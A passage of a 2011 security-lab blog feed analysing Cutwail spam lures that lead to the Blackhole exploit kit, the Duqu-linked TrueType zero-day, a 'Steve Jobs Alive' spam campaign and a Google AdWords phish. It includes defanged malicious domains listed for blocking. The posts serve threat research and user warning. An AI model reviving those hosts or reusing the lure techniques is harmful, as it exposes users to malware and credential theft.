<p><a href="http://labs.m86security.com/wp-content/uploads/2011/11/MaliciousFacebookSpamTraps.png"><img class="aligncenter size-full wp-image-4180" title="Facebook spam campaign subject lines" src="http://labs.m86security.com/wp-content/uploads/2011/11/MaliciousFacebookSpamTraps.png" alt="" width="288" height="157" /></a></p>
<p>&nbsp;</p>
<p>The message body may look like a legitimate Facebook notification. However, further inspection reveals the underlying link redirecting to a malicious webpage.</p>
<p style="text-align: center;"><a href="http://labs.m86security.com/wp-content/uploads/2011/11/FacebookBHCutwail.png"><img class="aligncenter size-full wp-image-4179" title="Facebook Spam" src="http://labs.m86security.com/wp-content/uploads/2011/11/CutwailSpam.png" alt="" width="517" height="440" /></a></p>
<p>&nbsp;</p>
<p>Another campaign spammed out by Cutwail claims to be a flight ticket order.  The spam can be easily spotted by its subject lines. It looks seemingly like a “<em>forwarded”</em> or “<em>reply”</em> email and uses the subject format shown in the image below.</p>
<p><a href="http://labs.m86security.com/wp-content/uploads/2011/11/flightOrder-copy.png"><img class="aligncenter size-full wp-image-4181" title="&quot;Your Flight Order&quot; spam campaign subject lines" src="http://labs.m86security.com/wp-content/uploads/2011/11/flightOrder-copy.png" alt="" width="239" height="135" /></a></p>
<p>&nbsp;</p>
<p>Here is an example of the message:</p>
<p><a href="http://labs.m86security.com/wp-content/uploads/2011/11/FlightOrderScreensho.png"><img class="aligncenter size-full wp-image-4182" title="&quot;Your Flight Order&quot; spam campaign" src="http://labs.m86security.com/wp-content/uploads/2011/11/FlightOrderScreensho.png" alt="" width="511" height="508" /></a></p>
<p>There are two things you should notice about this particular spam campaign. Firstly, the visible URL shown does not conform to the URI naming scheme of not having a top level domain, a  clumsy mistake from the spammers. Other similar messages use “www.airlines.com” which is a parked domain. Secondly, “Airlines America” in the signature block is not a real airline company unless the spammers meant to imply American Airlines.</p>
<p>Two other spam campaigns resurfaced this week, namely the <em>&#8220;Automated Clearing House (ACH)&#8221;</em> and the <em>&#8220;scanned document&#8221;</em>.</p>
<p><a href="http://labs.m86security.com/wp-content/uploads/2011/11/ACH_HP.gif"><img class="aligncenter size-full wp-image-4191" title="ACH and Scanned document spam campaign" src="http://labs.m86security.com/wp-content/uploads/2011/11/ACH_HP.gif" alt="" width="511" height="507" /></a></p>
<p>The URL link in these campaigns points to a compromised web server that serves a small HTML file. The HTML file then contains a malicious iframe that opens up a Blackhole exploit kit landing page. This is the same exploit kit used in previous spam campaigns such as the <a href="http://labs.m86security.com/2011/10/steve-jobs-alive-spam-campaign-leads-to-exploit-page/">Steve Jobs is Alive</a> and <a href="http://labs.m86security.com/2011/06/malicious-linkedin-campaign/">fake LinkedIn notifications</a>.</p>
<p><a href="http://labs.m86security.com/wp-content/uploads/2011/11/landingPage.png"><img class="aligncenter size-full wp-image-4192" title="Blackhole Exploit landing page" src="http://labs.m86security.com/wp-content/uploads/2011/11/landingPage.png" alt="" width="500" height="179" /></a></p>
<p>If you are a system administrator, you may want to block the following exploit kit landing pages.</p>
<ul>
<li>crredret[dot]ru/main.php</li>
<li>www[dot]btredret[dot]ru/main.php</li>
<li>bqredret[dot]ru/main.php</li>
</ul>
<p>At the time of analysis, loading the exploit kit webpage downloaded <a href="http://www.virustotal.com/file-scan/report.html?id=d2011d408de13c661fcd3643eb9039dd7a81c6cb96a13416b37755d102407a4f-1322233510">SpyEye</a> and the  <a href="http://www.virustotal.com/file-scan/report.html?id=2340ee44273d0b1416ba723a0d2137e7ff113b934f691078894a99925d35eab3-1321520910">Bobax </a>spambot on to our vulnerable hosts.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.m86security.com/2011/12/cutwail-spam-campaigns-lure-users-to-blackhole-exploit-kit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>TrueType but not Truly Safe: The New Zero-Day Event</title>
		<link>http://labs.m86security.com/2011/11/truetype-but-not-truly-safe-the-new-zero-day-event/</link>
		<comments>http://labs.m86security.com/2011/11/truetype-but-not-truly-safe-the-new-zero-day-event/#comments</comments>
		<pubDate>11.08.11</pubDate>
		<dc:creator>Ziv Mador</dc:creator>
				<category><![CDATA[Vulnerabilities]]></category>

		<guid isPermaLink="false">http://labs.m86security.com/?p=4163</guid>
		<description><![CDATA[A new vulnerability in Windows, CVE -2011-3402, has been recently identified and is already exploited in the wild.  For now, only a handful of targeted attacks have been found. The vulnerability exists in Windows TrueType Font Parsing Engine and affects most Windows versions, including Windows 7. An attack involves a file which has a maliciously [...]]]></description>
			<content:encoded><![CDATA[<p>A new vulnerability in Windows, CVE -2011-3402, has been<br />
recently identified and is already exploited in the wild.  For now, only a<br />
handful of targeted attacks have been found. The vulnerability exists in<br />
Windows TrueType Font Parsing Engine and affects most Windows versions,<br />
including Windows 7. An attack involves a file which has a maliciously crafted<br />
TrueType font file (TTF) embedded in it. There are several file formats that<br />
use TrueType fonts, for example, file formats of Microsoft Office and Adobe<br />
Acrobat Reader. In the currently known targeted attacks, a Microsoft Word<br />
document was used. Once rendered on a vulnerable system, parsing the TTF file<br />
may end up with execution of malicious code. Microsoft has released an <a href="http://technet.microsoft.com/en-us/security/advisory/2639658"><span style="color: #000080;">advisory</span></a><br />
for this issue and also released a FixIt tool as a <a href="http://support.microsoft.com/kb/2639658"><span style="color: #000080;">workaround</span></a>. It disables access<br />
to the system file T2embed.dll in order to avoid TrueType font processing.<br />
However, a word of caution: Applications that use these fonts may break after<br />
this workaround is deployed.</p>
<p>In the known attacks, the installed malware is known as Duqu.<br />
The Laboratory of Cryptography and System Security (CrySyS) at Budapest University<br />
first reported these attacks and they were thoroughly investigated by that team<br />
and by Symantec in the following <a href="http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf"><span style="color: #000080;">article</span></a>.</p>
<p>M86 Security Secure Web Gateway (SWG) can be deployed with<br />
three possible antivirus scanners and they already released protection: <a href="http://www.kaspersky.com/about/news/product/2011/Kaspersky_Lab_Protects_Against_Duqu-originated_Zero-day_Vulnerability_in_Windows"><span style="color: #000080;">Kaspersky</span></a>,<br />
<a href="http://www.mcafee.com/us/about/duqu.aspx"><span style="color: #000080;">McAfee</span></a> and <a href="http://nakedsecurity.sophos.com/2011/11/02/new-zero-day-windows-kernel-vulnerability-associated-with-duqu-trojan/"><span style="color: #000080;">Sophos</span></a>. No additional Security Update by M86 Security is required. In addition, we are<br />
investigating adding more layers of protection in the future. Keep in mind,<br />
these attacks currently are not delivered via web browser but that can obviously change<br />
in the future.</p>
<p>We will continue to monitor the situation and update this blog post as necessary.</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.m86security.com/2011/11/truetype-but-not-truly-safe-the-new-zero-day-event/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>&#8220;Steve Jobs Alive!&#8221; Spam Campaign Leads To Exploit Page</title>
		<link>http://labs.m86security.com/2011/10/steve-jobs-alive-spam-campaign-leads-to-exploit-page/</link>
		<comments>http://labs.m86security.com/2011/10/steve-jobs-alive-spam-campaign-leads-to-exploit-page/#comments</comments>
		<pubDate>10.07.11</pubDate>
		<dc:creator>Rodel Mendrez</dc:creator>
				<category><![CDATA[Spam]]></category>
		<category><![CDATA[Vulnerabilities]]></category>

		<guid isPermaLink="false">http://labs.m86security.com/?p=4142</guid>
		<description><![CDATA[It was a sad day in the technology industry with the recent passing of Apple’s legendary leader, Steve Jobs. Unfortunately, the cyber-criminals see this as an opportunity. Today, we started seeing a Steve Jobs spam campaign, with the subject suggesting that he is still alive. Steve Jobs Alive! Steve Jobs Not Dead! Steve Jobs: Not Dead [...]]]></description>
			<content:encoded><![CDATA[<p>It was a sad day in the technology industry with the recent passing of Apple’s legendary leader, Steve Jobs. Unfortunately, the cyber-criminals see this as an opportunity. Today, we started seeing a Steve Jobs spam campaign, with the subject suggesting that he is still alive.</p>
<blockquote><p>Steve Jobs Alive!</p>
<p>Steve Jobs Not Dead!</p>
<p>Steve Jobs: Not Dead Yet!</p>
<p>Is Steve Jobs Really Dead?</p></blockquote>
<div id="attachment_4144" class="wp-caption aligncenter" style="width: 551px"><a href="http://labs.m86security.com/wp-content/uploads/2011/10/emailScreenshot.png"><img class="size-full wp-image-4144" title="Steve Jobs spam campaign email screenshot" src="http://labs.m86security.com/wp-content/uploads/2011/10/emailScreenshot.png" alt="" width="541" height="246" /></a><p class="wp-caption-text">Sample of the Steve Jobs spam campaign</p></div>
<p>The URL links in the spam are many and varied. The websites that they point to all look to be hacked by the addition of obfuscated code that, after two layers of redirects, ultimately ends up at a BlackHole exploit kit landing page.</p>
<div id="attachment_4145" class="wp-caption aligncenter" style="width: 604px"><a href="http://labs.m86security.com/wp-content/uploads/2011/10/Exploitscreenshot.png"><img class="size-full wp-image-4145 " title="Exploit screenshot" src="http://labs.m86security.com/wp-content/uploads/2011/10/Exploitscreenshot.png" alt="" width="594" height="409" /></a><p class="wp-caption-text">The HTML source code of the Blackhole Exploit kit landing page</p></div>
<p>The intermediary redirect URLs are random-looking domains, with a top level domain of .ms (Monserrat in case you didn&#8217;t know), here are some examples:</p>
<ul>
<li><em>hxxp://xnyiinobfb[dot]ce[dot]ms/index.php</em></li>
<li><em>hxxp://derhvbq[dot]ce[dot]ms/index.php</em></li>
</ul>
<p>The purpose of the exploit kit is to try and exploit vulnerabilities on the system and eventually download malicious executable files. At this stage, we are not sure what the ultimate payload is, as no files were actually downloaded on our test system.</p>
<p>Unfortunately, many people may find this spam campaign &#8220;click-worthy&#8221; given the icon that Steve Jobs was. The usual advice applies &#8211; avoid clicking links in unsolicited email. In this case, one simple click is all it takes to get compromised.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.m86security.com/2011/10/steve-jobs-alive-spam-campaign-leads-to-exploit-page/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New Google AdWords Phish In-the-wild</title>
		<link>http://labs.m86security.com/2011/10/new-google-adwords-phish-in-the-wild/</link>
		<comments>http://labs.m86security.com/2011/10/new-google-adwords-phish-in-the-wild/#comments</comments>
		<pubDate>10.04.11</pubDate>
		<dc:creator>Rodel Mendrez</dc:creator>
				<category><![CDATA[Phishing]]></category>
		<category><![CDATA[Google AdWords]]></category>
		<category><![CDATA[Spam]]></category>

		<guid isPermaLink="false">http://labs.m86security.com/?p=4108</guid>
		<description><![CDATA[For those of you who have a Google AdWords account, be wary of a new Google AdWords spam campaign we have seen in-the-wild earlier this week. The spam email may use the following subject lines: Google AdWords: You have a new alert. Google Team: You have a new alert Here is an example of the [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://labs.m86security.com/wp-content/uploads/2011/10/GooglePhishLandingPage.png"><br />
</a>For those of you who have a Google AdWords account, be wary of a new Google AdWords spam campaign we have seen in-the-wild earlier this week. The spam email may use the following subject lines:</p>
<blockquote><p>Google AdWords: You have a new alert.</p>
<p>Google Team: You have a new alert</p></blockquote>
<p>Here is an example of the spam email posing as a notification email from Google AdWords.</p>
<p><a href="http://labs.m86security.com/wp-content/uploads/2011/10/GooglePhishEml.png"><img class="aligncenter size-full wp-image-4110" title="Google Phishing Email" src="http://labs.m86security.com/wp-content/uploads/2011/10/GooglePhishEml.png" alt="" width="649" height="428" /></a></p>
<p>&nbsp;</p>
<p style="text-align: left;">If you notice in the sample email, the URL link that appears to be linking to your Adwords account looks dodgy. But if that obvious sign didn&#8217;t prevent you from clicking the link, you would have been redirected to a Google AdWords phishing webpage.</p>
<p style="text-align: center;"><a href="http://labs.m86security.com/wp-content/uploads/2011/10/GooglePhishLandingPage.png"><img class="aligncenter size-full wp-image-4115" style="border-style: initial; border-color: initial;" title="Google AdWords Landing Page" src="http://labs.m86security.com/wp-content/uploads/2011/10/GooglePhishLandingPage.png" alt="" width="630" height="378" /></a></p>
<p style="text-align: left;">After entering a username and password, the webpage sends these credentials to the cyber-criminal&#8217;s webserver.</p>
<div id="attachment_4116" class="wp-caption aligncenter" style="width: 589px"><a href="http://labs.m86security.com/wp-content/uploads/2011/10/GooglePhishTCPStream.png"><img class="size-full wp-image-4116 " title="Google AdWords Phish TCP Stream" src="http://labs.m86security.com/wp-content/uploads/2011/10/GooglePhishTCPStream.png" alt="" width="579" height="168" /></a><p class="wp-caption-text">The HTTP POST request when the user enters their Google account credentials. It sends the username and password to the phisher&#39;s webpage.</p></div>
<p style="text-align: left;">Of course, once you enter your Google account credentials in the phishing page this will NOT just compromise your Google AdWords account but all your Google services like GMail or Google+ will be affected as well. When you receive these sorts of notification emails, always double check the URL before you click on them &#8211; if it looks suspicious, it probably is.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.m86security.com/2011/10/new-google-adwords-phish-in-the-wild/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

